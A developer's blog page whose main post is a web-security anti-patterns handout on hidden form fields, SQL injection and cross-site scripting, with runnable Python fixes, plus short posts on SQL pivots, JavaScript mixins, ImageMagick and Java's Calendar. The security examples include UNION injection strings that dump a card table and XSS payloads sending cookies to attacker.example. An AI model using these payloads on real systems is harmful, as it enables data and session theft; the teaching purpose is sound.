Youth culture killed my dog

Common Web Security Anti-Patterns   16 Jan 05

The following is from a handout I used for a presentation to a group of Java programmers. In retrospect I don't think I like the anti-pattern format, but hopefully you will find it helpful in spite of that.

Name: Trusting form data
Problem: Preserving state across a series of web pages and form submissions.
Supposed Solution: Store information in hidden form fields.
Exploit: Hidden fields are sent back by the browser like any other form field, so an attacker can change their values at will (with a local proxy, or simply by hand-crafting the request) to subvert the application. The application then uses the altered data in calculations that should only be performed with trusted data.
Example: The data stored in the hidden field is the price of an item in an ecommerce system. A criminal organization exploits this to purchase a large number of expensive items at a 100% "discount".
Alternative Solutions:
  • Only accept data from forms when it doesn't matter if it is tampered with. For example, instead of storing the price in an ecommerce system, store only the product id and look the price up on the server using the product id as a key.
  • Use a framework such as Lakeshore that abstracts away the problem of managing state across pages.
  • In cases where sensitive data must be stored on the client side (e.g. a price quote) the sensitive data must be cryptographically signed. Use an HMAC keyed with a server-side secret rather than a plain hash of the secret concatenated with the data: with Merkle-Damgård hashes such as MD5, SHA-1 and SHA-256 the hash(secret || data) construction is open to length-extension attacks, in which an attacker appends to the data and produces a valid tag without knowing the secret. The tag is always passed with the sensitive data, recomputed on receipt and compared in constant time, so any tampering is detected. Including an expiry time in the signed data also limits how long a stale quote can be replayed.
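An added example of the third alternative, not from the handout and not Lakeshore's or any framework's code. It is written in Python so it runs stand-alone; Java's javax.crypto.Mac with "HmacSHA256" gives the same construction. The secret, the field layout (product id, price in cents, expiry) and the quote values are assumptions made up for the example.

```python
import hashlib
import hmac
import time
from typing import Optional, Tuple

# Assumed server-side key for the example only; load it from configuration in a
# real deployment and never send it to the client.
SECRET = b"example-only-secret-do-not-use"


def sign_quote(product_id: int, price_cents: int, expires: int,
               secret: bytes = SECRET) -> str:
    """Value to put in the hidden field: the quote fields plus an HMAC over them.

    HMAC, not hash(secret + data): the plain-hash construction is open to
    length-extension attacks with MD5, SHA-1 and SHA-256.
    """
    payload = f"{product_id}:{price_cents}:{expires}"
    tag = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}:{tag}"


def verify_quote(token: str, now: Optional[int] = None,
                 secret: bytes = SECRET) -> Optional[Tuple[int, int]]:
    """Check a hidden-field value posted back by the browser.

    Returns (product_id, price_cents) if the tag is valid and the quote has
    not expired, otherwise None. Changing the price, the product id or the
    expiry changes the recomputed tag, so tampering is detected.
    """
    parts = token.split(":")
    if len(parts) != 4:
        return None
    pid_s, price_s, exp_s, tag = parts
    payload = f"{pid_s}:{price_s}:{exp_s}"
    expected = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison on bytes: a plain == would leak, through
    # timing, how much of a forged tag is correct (bytes also avoid the
    # ASCII-only restriction compare_digest places on str arguments).
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return None
    # The payload is authentic here, so it has the format the server
    # produced and these conversions cannot fail; guard anyway.
    try:
        product_id, price_cents, expires = int(pid_s), int(price_s), int(exp_s)
    except ValueError:
        return None
    if (now if now is not None else int(time.time())) > expires:
        return None
    return product_id, price_cents


if __name__ == "__main__":
    token = sign_quote(42, 19999, int(time.time()) + 600)
    print("hidden field:      ", token)
    print("posted back intact:", verify_quote(token))
    tampered = token.replace(":19999:", ":1:", 1)
    print("price changed to 1:", verify_quote(tampered))
```

The product id and price are still visible to the customer, which is fine for a quote; if the signed data must also stay confidential, encrypt it as well (or keep it server side and hand the client only an opaque key).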
Name: SQL Injection
Problem: User supplied data must be used in queries against a database.
Supposed Solution: Just substitute the user input into an SQL template and execute it.
Exploit: An attacker can carefully craft the supplied data to execute arbitrary SQL. The details vary by database vendor, but for Oracle the key concept is starting the SQL to be inserted with a single quote: it terminates the string literal the template wrapped around the input, and everything that follows is parsed as SQL.
Example: An ecommerce system allows the catalog of products to be searched based on a user supplied string by simply inserting the user supplied string into a query. The attacker enters the following as a search criterion: x' UNION SELECT table_name FROM user_tables WHERE 'x'='x. The trailing 'x'='x closes the literal the template opens, and the UNION must return the same number of columns as the original query (padding with NULLs where necessary). This allows the attacker to obtain the name of the table that credit card information is stored in, then use the same technique to retrieve all of the credit card numbers stored in the system.
Alternative Solutions:
  • Don't build SQL by concatenating strings in raw JDBC calls. Use prepared statements with bound parameters (java.sql.PreparedStatement, or a library such as SQLProcessor that always uses prepared statements). A bound value is passed to the database separately from the SQL text and is never re-parsed as SQL, so this is sufficient on any database, provided every user supplied value is bound. Table and column names and ORDER BY directions cannot be bound; check those against a fixed list of allowed values.
  • Escaping single quotes in user input before using it in an SQL statement is a fallback at best: it does nothing for numeric positions, where the attacker needs no quote at all, and the escaping rules differ by vendor (MySQL, for example, also treats backslash specially).
Further reading: http://www.securityfocus.com/infocus/1644
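An added example, not the handout's or SQLProcessor's code, that runs the anti-pattern next to the bound-parameter version and also shows why quote escaping fails for a numeric parameter. Python's built-in sqlite3 module stands in for JDBC and Oracle so it runs offline: sqlite_master is SQLite's counterpart to Oracle's user_tables, and the products and cards tables (with standard test card numbers) are constructed for the example.

```python
import sqlite3
from typing import List


def build_catalog() -> sqlite3.Connection:
    """Constructed sample database: a product catalog and a table of card
    numbers the search feature should never be able to reach."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE cards (id INTEGER PRIMARY KEY, number TEXT);
        INSERT INTO products (name) VALUES ('red widget'), ('blue widget');
        INSERT INTO cards (number) VALUES ('4111111111111111'), ('5555555555554444');
    """)
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> List[str]:
    """Anti-pattern: the user's string is pasted into the SQL template."""
    sql = "SELECT name FROM products WHERE name = '" + term + "'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn: sqlite3.Connection, term: str) -> List[str]:
    """Bound parameter: the value travels separately from the SQL text and is
    never parsed as SQL, so quotes in it are just characters to match."""
    sql = "SELECT name FROM products WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (term,))]


def product_by_id_escaped(conn: sqlite3.Connection, id_text: str) -> List[str]:
    """The quote-escaping fallback applied to a numeric position. The template
    puts no quotes around the value, so the payload needs none either and the
    escaping never triggers."""
    sql = "SELECT name FROM products WHERE id = " + id_text.replace("'", "''")
    return [row[0] for row in conn.execute(sql)]


def product_by_id_safe(conn: sqlite3.Connection, id_text: str) -> List[str]:
    """Convert to the expected type first, then bind; non-numeric input is
    rejected (ValueError) before any SQL is built."""
    product_id = int(id_text)
    sql = "SELECT name FROM products WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (product_id,))]


# The handout's Oracle payload, with SQLite's catalog table substituted.
LIST_TABLES = "x' UNION SELECT name FROM sqlite_master WHERE 'x'='x"
# Second stage, once the attacker knows the table name.
DUMP_CARDS = "x' UNION SELECT number FROM cards WHERE 'x'='x"
# Numeric-position payload: no quote anywhere, so escaping quotes is moot.
DUMP_CARDS_NUMERIC = "1 UNION SELECT number FROM cards"


if __name__ == "__main__":
    conn = build_catalog()
    print("vulnerable, list tables:", search_vulnerable(conn, LIST_TABLES))
    print("vulnerable, dump cards: ", search_vulnerable(conn, DUMP_CARDS))
    print("safe, same payload:     ", search_safe(conn, LIST_TABLES))
    print("escaped, numeric id:    ", product_by_id_escaped(conn, DUMP_CARDS_NUMERIC))
    print("safe, numeric id:       ", product_by_id_safe(conn, "1"))
```

The same two-stage attack works against any concatenated query; the only thing that changes from Oracle to SQLite is the name of the catalog table.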

Name: Cross Site Scripting (xss)
Problem: User supplied data is displayed to other users
Exploit: An attacker can carefully craft the data so that the victim's browser interprets it as HTML or JavaScript rather than as text, letting it do a wide variety of malicious things when another user views the data.
Example: An ecommerce system displays the names and addresses of problem orders on a screen accessible by an administrative user. The attacker enters javascript for his address that will steal the viewing user's JSESSIONID cookie and post it to a logging URL controlled by the attacker. When the administrator views the attacker's order his JSESSIONID is stolen and the attacker can then impersonate the administrator.
Alternative Solutions:
  • Validate user supplied input against what the field should contain (an address has no reason to contain < or >). Treat this as defense in depth only: blacklists of "dangerous" characters or tags are routinely bypassed (an <img> with an onerror handler needs no <script> tag at all).
  • Encode all user supplied data at output time, for the context it is written into (HTML body, attribute value, JavaScript, URL), rather than trusting that it was filtered on the way in. Marking the session cookie HttpOnly so that document.cookie cannot read it blunts this particular theft, but not XSS in general.
Further reading:
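An added example, not from the handout, of both alternatives applied to the admin screen described above. Python's html.escape stands in for whatever encoder the Java view layer provides; the two attacker "addresses" and the attacker.example host are constructed for the demonstration, and the blacklist filter is included only to show it being bypassed.

```python
import html
import re

# Constructed attacker input for the "address" field of an order. It tries to
# send the viewing administrator's cookies to a server the attacker controls.
ADDRESS_SCRIPT = ('<script>new Image().src="http://attacker.example/log?"'
                  '+document.cookie</script>')
# Same goal with no <script> tag at all, to slip past a tag blacklist.
ADDRESS_IMG = ('<img src=x onerror="location=\'http://attacker.example/log?\''
               '+document.cookie">')


def blacklist_filter(text: str) -> str:
    """The 'filter dangerous input' alternative: strip <script> tags on the
    way in. Present only to demonstrate that it is bypassable."""
    return re.sub(r"(?i)</?script[^>]*>", "", text)


def render_cell_unsafe(address: str) -> str:
    """Anti-pattern: stored data written into the admin page as raw HTML."""
    return f"<td>{address}</td>"


def render_cell_safe(address: str) -> str:
    """HTML-body context: encode &, <, > and both quote characters at output
    time, so the browser shows the attacker's text instead of executing it."""
    return f"<td>{html.escape(address, quote=True)}</td>"


def render_attr_safe(address: str) -> str:
    """Attribute context, e.g. pre-filling an edit form. quote=True matters
    here: an unescaped quote would end the attribute and start a new one."""
    return f'<input name="address" value="{html.escape(address, quote=True)}">'


def starts_a_tag(rendered_cell: str) -> bool:
    """Rough check for the demo: does the cell content still contain anything
    a browser would parse as the start of a tag?"""
    inner = rendered_cell[len("<td>"):-len("</td>")]
    return re.search(r"<[A-Za-z/!]", inner) is not None


if __name__ == "__main__":
    for payload in (ADDRESS_SCRIPT, ADDRESS_IMG):
        print("raw:     ", render_cell_unsafe(payload))
        print("filtered:", render_cell_unsafe(blacklist_filter(payload)))
        print("encoded: ", render_cell_safe(payload))
        print()
```

Encoding is a per-context decision: the body encoder above is wrong for a value dropped inside a <script> block or a URL, which need their own escaping rules.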

Stupid SQL tricks   13 Jan 05

Consider the following tables:

people

id name
1 Jack
2 Jane
3 Raja
4 Aaliyah

questions

id text
1 What’s your favorite color?
2 Do you like dogs?

answers

person_id question_id value
1 1 Red
1 2 Yes
2 1 Blue
2 2 No
.. .. ..

This SQL:


SELECT people.id,
       MAX(people.name) AS name,
       MAX(DECODE(answers.question_id, 1, answers.value)) AS favorite_color,
       MAX(DECODE(answers.question_id, 2, answers.value)) AS likes_dogs
FROM people, answers
WHERE people.id = answers.person_id
GROUP BY people.id

Will yield the following:
people.id name favorite_color likes_dogs
1 Jack Red Yes
2 Jane Blue No
3 Raja Green No
… … … …

A coworker of mine, Ken Gibbs, showed me this technique several years ago and I’ve used it frequently since. While this use of MAX and DECODE is hardly unknown, I have recently shown this to a few people who were really excited by it. So I thought I would share it with you, dear reader. Also, note that Oracle’s DECODE can easily be replaced with a CASE in other SQL dialects.

Update: fixed an error in the example SQL
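The CASE form of the same pivot, as an added example that is not part of the original post. It runs against a constructed copy of the three tables above in Python's built-in sqlite3 (standing in for Oracle), and adds one thing the post's query does not show: the comma join drops anyone with no answers, while a LEFT JOIN keeps them with NULLs in the pivoted columns. Aaliyah having no answers is an assumption for the example.

```python
import sqlite3
from typing import List, Tuple


def build_survey_db() -> sqlite3.Connection:
    """Constructed copy of the post's people/questions/answers tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE people (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE questions (id INTEGER PRIMARY KEY, text TEXT);
        CREATE TABLE answers (person_id INTEGER, question_id INTEGER, value TEXT);
        INSERT INTO people VALUES (1, 'Jack'), (2, 'Jane'), (3, 'Raja'), (4, 'Aaliyah');
        INSERT INTO questions VALUES (1, 'What''s your favorite color?'),
                                     (2, 'Do you like dogs?');
        INSERT INTO answers VALUES (1, 1, 'Red'),  (1, 2, 'Yes'),
                                   (2, 1, 'Blue'), (2, 2, 'No'),
                                   (3, 1, 'Green'), (3, 2, 'No');
    """)
    return conn


def pivot_sql(keep_unanswered: bool) -> str:
    """One row per person, one column per question.

    CASE yields the answer for the wanted question and NULL otherwise; MAX
    then collapses each person's group to the single non-NULL value. Every
    non-grouped column goes through an aggregate (MAX(people.name)) so the
    query is legal in dialects that enforce GROUP BY strictly, as Oracle does.
    """
    join = ("LEFT JOIN answers ON people.id = answers.person_id"
            if keep_unanswered else
            "JOIN answers ON people.id = answers.person_id")
    return f"""
        SELECT people.id,
               MAX(people.name) AS name,
               MAX(CASE WHEN answers.question_id = 1 THEN answers.value END) AS favorite_color,
               MAX(CASE WHEN answers.question_id = 2 THEN answers.value END) AS likes_dogs
        FROM people
        {join}
        GROUP BY people.id
        ORDER BY people.id
    """


def pivot(conn: sqlite3.Connection, keep_unanswered: bool = True) -> List[Tuple]:
    return conn.execute(pivot_sql(keep_unanswered)).fetchall()


if __name__ == "__main__":
    conn = build_survey_db()
    for row in pivot(conn, keep_unanswered=False):
        print(row)
    print("with LEFT JOIN, unanswered people survive:")
    for row in pivot(conn, keep_unanswered=True):
        print(row)
```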



Javascript, it's what's for dinner   25 Oct 04

Javascript is a good language. I like Ruby better, but it is certainly better than Java (which is not a good language) and it has certain unique charms. A dynamic, prototyped OO language with a runtime penetration of nearly 100% on desktop systems. I’m ashamed I haven’t done more with it.
This script from Florian Gross that adds several of the Ruby standard methods to Javascript is an excellent example of how flexible and clean Javascript is. Below is a code snippet for adding Ruby style mixin support to Javascript. While it is impressive that Javascript is flexible enough to allow this sort of thing, the truly amazing bit is that it is seven lines of straightforward code that even a casual Javascripter such as myself can understand.

Object.prototype.extend = function(other) {
 if (!this.mixins) this.mixins = []
 this.mixins.push(other)
 for (var property in other)
   if (!this.hasOwnProperty(property))
     this[property] = other[property]
}

Now for the practical aspects of programming Javascript Ruby style.
Here’s some brief documentation written by Florian. Also while using ruby.js in a script that interacts with the DOM, I ran into a bit of trouble. In Firefox at least the Array that is returned by getElementsByTagName does not have the added methods. I would appreciate any explanation as to why this is so, but there is a work around in the mean time.
Instead of:


foo.getElementsByTagName('tr').each(function(row) {
  // ...do something with the row...
});

You have to:

Array.fromObject(foo.getElementsByTagName('tr')).each(function(row) {
  // ...do something with the row...
});



ImageMagick rules the Gimp   05 Sep 04

I’ve always been jealous of graphic artists. They juggle dozens of layers and composite images with ease with their fancy photoshops and gimps. I’ve tried several times to do some simple tasks with the Gimp and was defeated in each case. So I’ve found myself going hat in hand to the “graphics guy” (no slight intended to the ladies; I’ve just never worked with a female graphic artist) for even the simplest of buttons and on personal projects I’ve just had to do without.

I’ve used ImageMagick occasionally over the years for converting between formats and checking image sizes. I recently stumbled on this great set of examples by Anthony Thyssen of using ImageMagick for complex multi-step manipulations. When you add in a terrific set of Ruby bindings, the result is graphical independence for people such as myself.

While I’ve still got a long way to go before I master these new techniques, I have used them to generate a banner for this page and a few buttons for a work project. Here’s the source of my banner generating script and you can try it out by clicking the Change banner link at the top of the page. Expect the banner to become ever more decadent as I add tricks to my tool box.



Greatest API design evar   02 Sep 04

<steveny> Never do this:
<steveny> Calendar calendar = Calendar.getInstance(Locale.US);
<steveny> calendar.set(Calendar.MONTH, month);
<steveny> calendar.set(Calendar.YEAR, year);
<steveny> if it is the 31st now (the calendar.getInstance() returns the current time)
<steveny> setting the month to a month with < 31 days
<steveny> will cause the calendar to be set to the 1st of the next month
<darrend> niiiice
<steveny> yep
<richier> greatest API design evAR
<steveny> so never do that ;)



Copyright © 2024 Leslie A. Hensley